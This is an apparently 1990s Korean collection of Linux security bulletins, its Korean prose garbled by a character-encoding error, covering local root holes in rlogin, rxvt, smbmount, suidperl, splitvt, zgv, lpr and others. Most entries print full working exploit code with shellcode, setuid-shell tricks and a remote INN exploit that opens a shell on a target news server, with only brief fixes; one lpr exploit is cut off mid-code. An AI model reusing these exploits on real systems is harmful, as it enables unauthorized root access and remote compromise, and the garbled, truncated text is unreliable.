ÇØ°áÃ¥
¾îÂ¥ÇÇ ÀÌ ÇÁ—αח¥Àº —çÆ®¸¸ ¾µ°ÍÀ̹ǗΠ700 ¸ðµå—Î ÇصдÙ.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º& aix rlogin
¸í—É
rlogin
½Ã½ºÅÛ
Linux Slackware 3.1, RedHat 2.0, 2.1
¹®Á¦Á¡
ÀÌ ÇÁ—αח¥Àº °ú°Å AIX 3.2 ¿¡¼ ¹ß°ßµÇ¾ú´ø ¾ÆÁÖ ½É°¢ÇÑ ¹ö±×—Î ¾Æ—¡
´Ü ÇÑÁٗΠ¹Û¿¡¼ —çÆ®—Î —α×ÀÎ ÇÒ ¼ö ÀÖ´Ù.
-f ¿É¼ÇÀ» ¾²¸é ¾ÆÀ̵ð üũ¸¦ Á¦´ë—Î ÇÏÁö ¸øÇÏ´Â ¹ö±×ÀÌ´Ù.
% rlogin haxored.net -l -froot
#
ÇØ°áÃ¥
¾î¼ ¾÷±×—¹À̵å Ç϶ó.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º rxvt
¸í—É
rxvt
½Ã½ºÅÛ
Linux Slackware 3.0, RedHat 2.1
others with rxvt suid root (and compiled with PRINT_PIPE)
¹®Á¦Á¡
X ¼¹ö¸¦ À§ÇÑ Å͹̳Π¿¡¹Ä—¹ÀÌÅÍÀÎ rxvt´Â ¹ö±×°¡ ÀÖ´Ù.
¾Æ—¡ÀÇ ¹æ¹ýÀ¸—Î ½±°Ô —çÆ®¸¦ ¾ò´Â´Ù.
1. Set DISPLAY environment variable if necessary so you can use
x clients.
2. In user shell:
$ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug
$ chmod +x /tmp/rxbug
$ rxvt -print-pipe /tmp/rxbug
3. In rxvt xclient:
$ cat
ESC[5i
ESC[4i
(The client will close at this point with a broken pipe)
4. $ /tmp/rxsh
# whoami
root
#
ÇØ°á
chmod -s /usr/X11R6/bin/rxvt
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º smbmount
¸í—É
smbmount
½Ã½ºÅÛ
Linux
¹®Á¦Á¡
»ï¹Ù-2.0.1 ¹öÁ‾(?)¿¡¼ ºñ—ÔµÈ °ÍÀ¸—Î ¹öÆÛ ¿À¹öÇ×ο츦 ÀÏÀ¸Å³¼ö ÀÖ´Ù.

#include
#include
#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90
/* This shell code is designed to survive being filtered by toupper()
*/
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";

unsigned long get_sp(void) {


__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int alignment=DEFAULT_ALIGNMENT;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) alignment = atoi(argv[3]);
printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
fprintf(stderr,"Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) (ptr+alignment);
for (i = 0; i < bsize-alignment; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + (128 - strlen(shellcode));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("USER",buff,1);
execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
}
¹®Á¦Á¡
¹ö±× ÇȽºµÈ smbfs-2.0.2 ¸¦ ¾²¸é ÇØ°áÀÌ µÇ¸ç ¹ØÀÇ ftp¿¡¼ ãÀ»¼ö ÀÖ´Ù.
ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-4.4.1/n1/samba
ftp://ftp.gwdg.de/pub/linux/misc/smbfs
http://www.sernet.de/vl/linux-lan/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º perl 5.001
¸í—É
perl (suidperl/sperl5.001)
½Ã½ºÅÛ
Linux Slackware 3.0
¹®Á¦Á¡
suid°¡ rootÀÎ ÆÞ ÇÁ—αח¥ÀÌ —ÎÄÃÀ‾Àú—Î ÇÏ¿©±Ý —çÆ®¸¦ ¾ò°Ô ÇØÁØ´Ù.
¾Æ—¡¿Í °°Àº °£´ÜÇÑ ÇÁ—αח¥À¸—Î —çÆ®—Î ¿¢¼¼½º ÇØÁØ´Ù.
#!/usr/bin/perl -U
# root access on any SUID perl infected system......
# chmod 4755 this script and run it....
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");
ÇØ°áÃ¥
700¸ðµå—Î ÇصдÙ.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º ÄùÀÌÅ© °ÔÀÓ
¸í—É
squake
½Ã½ºÅÛ
Linux
¹®Á¦Á¡
ÃÊâ±â ÀνºÅç µÉ¶§ squake¶ó´Â ÇÁ—αח¥Àº 4755ÀÇ ¸ðµå—Î µÇ¾îÀÖ´Ù.
±×—±µ¥ ÀÌÇÁ—αח¥ÀÌ Á¶ÀÛÀ» Çϸé segfault¸¦ ÀÏÀ¸ÄѼ —çÆ®¸¦ ¾òÀ»
¼ö ÀÖ´Ù.
squake -game aaaaaaaaaaaaaa <=(152°³ÀÇ ¹®ÀÚ°¡ µé¾î°¡¸é µÈ´Ù.)

ÇØ°áÃ¥
chmod 700 squake
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º splitvt
¸í—É
splitvt(1)
½Ã½ºÅÛ
Linux 2-3.X
¹®Á¦Á¡
—ÎÄà À‾Àú°¡ —çÆ®—Î —α×ÀÎ ÇÒ ¼ö ÀÕ´Ù.
¿À¹ö Ç×ο츦 ÀÏÀ¸Å³ ¼ö°¡ ÀÖ´Ù.
crimson~$ cc -o sp sp.c
crimson~$ sp
bash$ sp
bash$ splitvt
bash# whoami
root
sp.c ---------

long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}
main()
{
char eggplant[2048];
int a;
char *egg;
long *egg2;
char realegg[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
char *eggie = realegg;
egg = eggplant;
*(egg++) = 'H';
*(egg++) = 'O';
*(egg++) = 'M';
*(egg++) = 'E';
*(egg++) = '=';
egg2 = (long *)egg;
for (a=0;a<(256+8)/4;a++) *(egg2++) = get_esp() + 0x3d0 + 0x30;
egg=(char *)egg2;
for (a=0;a<0x40;a++) *(egg++) = 0x90;
while (*eggie)
*(egg++) = *(eggie++);
*egg = 0; /* terminate eggplant! */
putenv(eggplant);
system("/bin/bash");
}
ÇØ°áÃ¥
700 ¸ðµå—Î ÇÏ´Â°Ô »óÃ¥ÀÌ´Ù.
¾Æ´Ï¸é °¢ÀÚÀÇ ¸®´ª½º ÆäÀÌÁö—Î °¡¼ ¾÷±×—¡ÀÌÆ®¸¦ ÇÑ´Ù.
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º admin
¸í—É
admin
½Ã½ºÅÛ
Linux systems running admin-v1.2 and older ones (others?)
¹®Á¦Á¡
admin-v1.2 ÆÐÅ°Áö¿¡ ÀÖ´Â ½Ã½ºÅÛ ¾îµå¹Î Åø¿¡¼ ¹ö±×°¡ ¹ß°ßµÇ¾ú´Ù.
—ÎÄà À‾Àú°¡ /tmpµð—ºÅ丮ÀÇ ¾îµå¹Î Åø °ü—à ÆÄÀÏÀ» Áö¿ì°í À̸¦ ¸µÅ©
½ÃÄѼ —çÆ®ÀÇ ±ÇÇÑÀ¸—Î ¾îµðµç ÆÄÀÏÀ» ¸¸µé ¼ö ÀÖ´Ù.
/tmp/name.$$ ¶ó´Â ÆÄÀÏÀÇ ÇüÅ—ΠÁ¸ÀçÇÑ´Ù.
ÀÌ ÆÄÀÏÀ» /etc/passwd¿¡ ¿¬°á½ÃÄѼ passwdÆÄÀÏÀ» °íÄ¥ ¼öµµ ÀÖ°í
/.rhosts ¸¦ ¸¸µé ¼öµµ ÀÖ´Ù.
ÇØ°áÃ¥
700 ¸ðµå—Î ¹Ù²ã¶ó
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º svgalib/zgv
¸í—É
svgalib/zgv
½Ã½ºÅÛ
Redhat Linux 3.0.3 - 4.1
¾î¶² ¸®´ª½ºµçÁö zgv¿¡ setuid root ÀΰÍ
¹®Á¦Á¡
½ºÅà ¿À¹ö—ÖÀÌÆ®¸¦ ÀÏÀ¸ÄѼ ¹öÆÛ ¿À¹ö—± °ø°ÝÀ» ½ÃµµÇÏ¸é —çÆ®¸¦
¾òÀ» ¼ö ÀÖ´Ù.
zgv-2.7 Àº GIF³ª JPG¸¦ º¼¼ö ÀÖ´Â ºä¾î ÀÌ´Ù.
/*
*
* zgv exploit coded by BeastMaster V on June 20, 1997
*
* USAGE:
* For some strage reason, the filename length of this
* particular exploit must me one character long, otherwise you
* will be dropped into a normal unpriviledged shell. Go Figure....
* Try increasing the offest by increments of 10 if you get
* an Illegal Instruction or Segmentation Fault.
*
* $ cp zgv_exploit.c n.c
* $ cc -o n n.c
* $ ./n
* Oak driver: Unknown chipset (id = 0)
* bash#
*
* EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
*
*/

#include
#include
#include
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 4096
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() -4675;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("HOME", buffer, 1);

execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);


}
ÇØ°áÃ¥
svgalib-1.2.11 Àº º¸¾È»ó ¾î¶² ÇêÁ¡ÀÌ ÀÖÀ¸¹Ç—Î »õ—Î¿î ¹öÁ‾À» ÀνºÅç
ÇÏ¿©¶ó. ¶ÇÇÑ —¡µåÇÞ 4.0 4.1 4.2 »ç¿ëÀÚ ¶ÇÇÑ »õ—Î¿î ¹öÁ‾À» ÀνºÅç
½ÃÄÑ¾ß ÇÑ´Ù.
¾Æ—¡ÀÇ »çÀÌÆ®¿¡ °¡¸é °íÄ¥¼ö ÀÖ´Â ¹ö±× ÆÐÄ¡ÆÇÀÌ ³ª¿ÍÀÖ´Ù.
ftp://ftp.redhat.com/updates/4.2/i386/svgalib-1.2.10-3.i386.rpm

¼³Ä¡´Â ¾÷±×—¹À̵带 ÇØ¾ß ÇÑ´Ù. ¹ØÀÇ Ä¿¸Ç´õ Âü°í.


rpm -Uvh °¡Á®¿Â ÆÄÀϸí
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º InterNetNews
¸í—É
InterNetNews
½Ã½ºÅÛ
Linux/x86
¹®Á¦Á¡
¹öÆÛ ¿À¹öÇ×ο츦 ÀÏÀ¸ÄѼ —çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù.
--------------------------- innbuf.c -----------------------------
/*
* This just generates the x86 shellcode "and.class" tppabs="http://www.an
gelfire.com/ok/jotna/and.class" puts it in a file
* that nnrp can send. The offset and/or esp may need changing.
* To compile on most systems: cc innbuf.c -o innbuf. Usage:
* innbuf [offset] > file. (C) 1997 by Method
* P.S. Feel free to port this to other OS's.
*/
#include
#include
#include
#include
#define DEFAULT_OFFSET 792
#define BUFFER_SIZE 796
#define ADDRS 80
u_long get_esp()
{
return(0xefbf95e4);
}
int main(int argc, char **argv)
{
char *buff = NULL;
u_long *addr_ptr = NULL;
char *ptr = NULL;
int ofs = DEFAULT_OFFSET;
int noplen;
u_long addr;
int i;
u_char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
if(argc < 1)
ofs = atoi(argv[1]);
addr = get_esp() - ofs;
if(!(buff = malloc(4096))) {
fprintf(stderr, "can't allocate memory\n");
exit(1);
}
ptr = buff;
noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
memset(ptr, 0x90, noplen);
ptr += noplen;
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (unsigned long *)ptr;
for(i = 0; i < ADDRS / 4; i++)
*addr_ptr++ = addr;
ptr = (char *)addr_ptr;
*ptr = '\0';
printf(
"Path: dev.null!nntp\n"
"From: devNull @%s\n"
"Newsgroups: alt.test\n"
"Subject: 4 out of 5 Dweebs prefer INND for getting
r00t\n"
"Message-ID: <830201540.9220@dev.null.com>\n"
"Date: 9 Jun 1997 15:15:15 GMT\n"
"Lines: 1\n"
"\n"
"this line left not left intentionally blank\n"
".\n", buff);
}
------------------------------------------------------------------
---------------------------- nnrp.c ------------------------------
/*
* Remote exploit for INN version < 1.6. Requires 'innbuf'
* program to operate. To compile: cc nnrp.c -o nnrp. Usage:
* nnrp . (C) 1997 by Method of
* Dweebs
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define POST "POST\n"
#define SAY(a, b) write(a, b, strlen(b))
#define CHOMP(a, b) read(a, b, sizeof(b))
#define basename(a) bname(a)
char *me;
make_addr(char *name, struct in_addr *addr)
{
struct hostent *hp;
if(inet_aton(name, addr) == 0) {
if(!(hp = gethostbyname(name))) {
fprintf(stderr, "%s: ", me);
herror(name);
exit(1);
}
addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr;
}
}
char *bname(char *str)
{
char *cp;
if((cp = (char *)strrchr(str, '/')) != NULL)
return(++cp);
else
return(str);
}
void my_err(char *errstr, int err)
{
fprintf(stderr, "%s: ", me);
perror(errstr);
exit(err);
}
void usage()
{
printf(
"INN version 1.[45].x exploit by Method
\n"
"Usage: %s \n"
"Will start a shell on the remote host.\n"
"The second argument is the file containing the
overflow data.\n",
me);
exit(1);
}
select_loop(int netfd)
{
int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO;
char buf[512];
fd_set rfds;
for( ; ; ) {
FD_ZERO(&rfds);
FD_SET(in, &rfds);
FD_SET(netfd, &rfds);
if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL))
< 0)
my_err("select", 1);
if(!ret)
continue;
if(FD_ISSET(in, &rfds)) {
if((n = read(in, buf, sizeof(buf))) > 0)
write(netfd, buf, n);
}
if(FD_ISSET(netfd, &rfds)) {
if((n = read(netfd, buf, sizeof(buf))) > 0)
write(out, buf, n);
else
break;
}
}
}
int news_sock(char *host)
{
struct sockaddr_in sin;
int sock;
sin.sin_port = htons(119);
sin.sin_family = AF_INET;
make_addr(host, &(sin.sin_addr));
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
my_err("socket", 1);
if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
my_err("connect", 1);
return(sock);
}
void send_egg(int sk, char *file)
{
char buf[BUFSIZ];
int dfd;
int n;
if((dfd = open(file, O_RDONLY)) < 0)
my_err("open", 1);
printf("Executing innd exploit.. be patient.\n");

n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
SAY(sk, POST);
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
sleep(2);
printf("Sending overflow data.\n");
while((n = CHOMP(dfd, buf)) > 0)
write(sk, buf, n);
sleep(2);
}
void main(int argc, char **argv)
{
char *victim, *filename;
int s;
me = basename(argv[0]);
if(argc != 3)
usage();
filename = argv[2];
send_egg(s = news_sock(victim = argv[1]), filename);
select_loop(s);
fprintf(stderr, "Connection closed.\n");
printf("Remember: Security is futile. Dweebs WILL own
you.\n");
exit(0);
}
------------------------------------------------------------------
ÇØ°áÃ¥
¾Æ—¡ÀÇ »çÀÌÆ®¿¡ °¡¼ ÆÐÄ¡ ¹öÁ‾À» ¹Þ´Â´Ù.
http://www.purplefrog.com/~thoth/netpipes/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º libXt (2)
¸í—É

libXt
½Ã½ºÅÛ
RedHat 4.0, 4.1, 4.2
¹®Á¦Á¡
¹öÆÛ ¿À¹öÇ×ο츦 ÀÏÀ¸ÄѼ —çÆ®¸¦ ¾òÀ» ¼ö ÀÖ´Ù.
ÀÌ°ÍÀº linXtÀÚü°¡ ¹®Á¦°¡ ÀÖÀ¸¹Ç—Î ±× ÆÄ±Þ È¿°ú´Â ¾öû³ª´Ù.
ÇØ°áÃ¥

$ cd /usr/X11/bin
$ find . -type f -a \( -perm -2000 -o -perm -4000 \) -print
À§ÀÇ ¸í—ÉÀ¸—Î setuid rootÀÎ ÆÄÀÏÀ» ã¾Æ¼ ¸ðµÎ setuid¸¦ ¾ø¾Ö¶ó.
¾Æ—¡ÀÇ »çÀÌÆ®¿¡¼ Àڽſ¡°Ô ¸Â´Â °ÍÀ» °ñ¶ó ¾÷±×—¹ÀÌµå ½ÃÄѶó.
o Red Hat Linux/Alpha 4.1, 4.2
ftp://ftp.redhat.com/updates/4.2/alpha/XFree86-devel-3.2-10.alpha.rpm
ftp://ftp.redhat.com/updates/4.2/alpha/XFree86-libs-3.2-10.alpha.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-devel-3.$
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-libs-3.2$

o Red Hat Linux/Intel 4.0, 4.1, 4.2


ftp://ftp.redhat.com/updates/4.2/i386/XFree86-devel-3.2-10.i386.rpm
ftp://ftp.redhat.com/updates/4.2/i386/XFree86-libs-3.2-10.i386.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-devel-3.$

ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/XFree86-libs-3.2$
o Red Hat Linux/SPARC 4.0, 4.1, 4.2
ftp://ftp.redhat.com/updates/4.2/sparc/X11R6.1-devel-pl1-21.sparc.rpm
ftp://ftp.redhat.com/updates/4.2/sparc/X11R6.1-libs-pl1-21.sparc.rpm
ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/X11R6.1-devel-pl$

ftp://ftp.aoy.com/pub/Linux/security/DISTRIBUTION-FIXES/RedHat/X11R6.1-libs-pl1$
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º lpr (2)
¸í—É
lpr
½Ã½ºÅÛ
Linux 2.0.0, 2.0.30 (SW 3.0)
¹®Á¦Á¡
lpr ffffffffff.......ffff (to 1023 characters)
À§¿Í °°ÀÌ ÇÏ¿© ¹öÆÛ ¿À¹öÇ×ο츦 ÀÏÀ¸Å°´Â ¹®Á¦—Î —çÆ®¸¦ ¾ò´Â´Ù.
/*
* lpr_exploit.c - Buffer overflow exploit for the lpr program.
* Adapted from code found in "stack smashing..." by Aleph One
* aleph1@underground.org
*
* "wisdom is knowledge passed from one to another", Thanks
*/
#include
#define DEFAULT_OFFSET 1023
#define DEFAULT_BUFFER_SIZE 2289
#define NOP 0x90
/*
* The hex representation of the code to produce an interactive shell.
* Oviously since this is for a Linux Box, you may need to generate
*/
char shellcode [] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void)
{ __asm__("mov %esp,%eax"); }
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
/* set aside the memory for our shell code */
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
/* Get the address of our stack pointer */
addr = get_sp() - offset;
/* fill our buffer with its address */
ptr = buff;
addr_ptr = (long *)ptr;
for(i = 0; i-- lpr.c --<
/*
* /usr/bin/lpr buffer overflow exploit for Linux with
* non-executable stack
* Copyright (c) 1997 by Solar Designer
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SIZE 1200 /* Amount of data to overflow with */
#define ALIGNMENT 11 /* 0, 8, 1..3, 9..11 */
#define ADDR_MASK 0xFF000000
char buf[SIZE];
int *ptr;
int pid, pc, shell, step;
int started = 0;
jmp_buf env;
void handler() {
started++;
}
/* SIGSEGV handler, to search in libc */
void fault() {
if (step < 0) {
/* Change the search direction */
longjmp(env, 1);
} else {
/* The search failed in both directions */
puts("\"/bin/sh\" not found, bad luck");
exit(1);
}
}
void error(char *fn) {
perror(fn);
if (pid > 0) kill(pid, SIGKILL);
exit(1);
}
void main() {
signal(SIGUSR1, handler);
/* Create a child process to trace */
if ((pid = fork()) < 0) error("fork");
if (!pid) {
/* Send the parent a signal, so it starts tracing */
kill(getppid(), SIGUSR1);
/* A loop since the parent may not start tracing immediately */
while (1) system("");
}
/* Wait until the child tells us the next library call will be
system() */
while (!started);
if (ptrace(PTRACE_ATTACH, pid, 0, 0)) error("PTRACE_ATTACH");
/* Single step the child until it gets out of system() */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) != ((int)main & ADDR_MASK));
/* Single step the child until it calls system() again */
do {
waitpid(pid, NULL, WUNTRACED);
pc = ptrace(PTRACE_PEEKUSR, pid, 4*EIP, 0);
if (pc == -1) error("PTRACE_PEEKUSR");
if (ptrace(PTRACE_SINGLESTEP, pid, 0, 0))
error("PTRACE_SINGLESTEP");
} while ((pc & ADDR_MASK) == ((int)main & ADDR_MASK));
/* Kill the child, we don't need it any more */
if (ptrace(PTRACE_KILL, pid, 0, 0)) error("PTRACE_KILL");
pid = 0;

printf("system() found at: %08x\n", pc);


/* Let's hope there's an extra NOP if system() is 256 byte aligned */
if (!(pc & 0xFF))
if (*(unsigned char *)--pc != 0x90) pc = 0;
/* There's no easy workaround for these (except for using another
function) */
if (!(pc & 0xFF00) || !(pc & 0xFF0000) || !(pc & 0xFF000000)) {
puts("Zero bytes in address, bad luck");
exit(1);
}
/*
* Search for a "/bin/sh" in libc until we find a copy with no zero
bytes
* in its address. To avoid specifying the actual address that libc is
* mmap()ed to we search from the address of system() in both
directions
* until a SIGSEGV is generated.
*/
if (setjmp(env)) step = 1; else step = -1;
shell = pc;
signal(SIGSEGV, fault);
do
while (memcmp((void *)shell, "/bin/sh", 8)) shell += step;
while (!(shell & 0xFF) || !(shell & 0xFF00) || !(shell & 0xFF0000));
signal(SIGSEGV, SIG_DFL);
printf("\"/bin/sh\" found at: %08x\n", shell);
/*
* When returning into system() the stack should look like:
* pointer to "/bin/sh"
* return address placeholder
* stack pointer -> pointer to system()
*
* The buffer could be filled with this 12 byte pattern, but then we
would
* need to try up to 12 values for the alignment. That's why a 16 byte
pattern
* is used instead:
* pointer to "/bin/sh"
* pointer to "/bin/sh"
* stack pointer (case 1) -> pointer to system()
* stack pointer (case 2) -> pointer to system()
*
* Any of the two stack pointer values will do, and only up to 8
values for
* the alignment need to be tried.
*/
memset(buf, 'x', ALIGNMENT);
ptr = (int *)(buf + ALIGNMENT);
while ((char *)ptr < buf + SIZE - 4*sizeof(int)) {
*ptr++ = pc; *ptr++ = pc;
*ptr++ = shell; *ptr++ = shell;
}
buf[SIZE - 1] = 0;
execl("/usr/bin/lpr", "lpr", "-C", buf, NULL);
error("execl");
}
>-- lpr.c --<
ÇØ°áÃ¥
¾Æ—¡¿¡¼ ÆÐÄ¡ ÆÄÀÏÀ» ã¾Æ¼ ÆÐÄ¡Ç϶ó.
http://www.false.com/security/linux-stack/
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º psaux µð¹ÙÀ̽º
¸í—É
/dev/psaux
½Ã½ºÅÛ
Linux with psaux device
¹®Á¦Á¡
¾Æ—¡¿Í °°Àº ¹®Á¦°¡ ÀÖ´Ù.
cat /bin/bash > /dev/psaux
[CTRL-C]
ÀÌ°ÍÀº /dev/psaux ÀÇ Æ۹̼ÇÀÌ 666 ¸ðµå—Î µÇ¾î¼ ¾Æ¹«³ª ¾µ¼ö ÀÖ°Ô µÇ±â
¶§¹®ÀÌ´Ù.
ÀÌ ¹ö±×´Â ps/2 Å°º¸µå¸¦ ÀÌ¿ëÇÏ´Â »ç¶÷¿¡°Ô ÇØ´çµÈ´Ù.

ÇØ°áÃ¥
ÀÌ µð¹ÙÀ̽ºÀÇ Æ۹̼ÇÀ» ÀÏ¹Ý À‾Àú°¡ Àб⸸ °¡´ÉÇϵµ—Ï Çضó
ÀÏ¹Ý À‾Àú°¡ ¾²±â¸¦ ÇÒ ¼ö ¾øµµ—Ï Çضó
chmod 664 /dev/psaux
---------------------------
Á¦ ¸ñ: [º¸¾È] ¸®´ª½º telnet (1)
¸í—É
telnet
½Ã½ºÅÛ
RedHat 4.0
¹®Á¦Á¡
¿øÇϴ ȣ½ºÆ®¿¡ ¾î¶² °èÁ¤ÀÌ ÀÖ´ÂÁö ¾ø´ÂÁö¸¦ È®ÀÎ ÇÒ ¼ö ÀÖ´Ù.
¿¹¸¦ µé¾î.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Red Hat Linux release 4.0 (Colgate)
Kernel 2.0.24 on an i586
login: bug
Password:
Login incorrect
Connection closed by foreign host.
¾ø´Â °èÁ¤À» Àԗ½ÿ¡ Çѹø¿¡ ³¡³´Ù.
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Red Hat Linux release 4.0 (Colgate)
Kernel 2.0.24 on an i586
login: root
Password:
Login incorrect
login:
login:
login:
login:
°èÁ¤ÀÌ ÀÖÀ» °æ¿ì °è¼Ó ¹°¾î º»´Ù.
---------------------------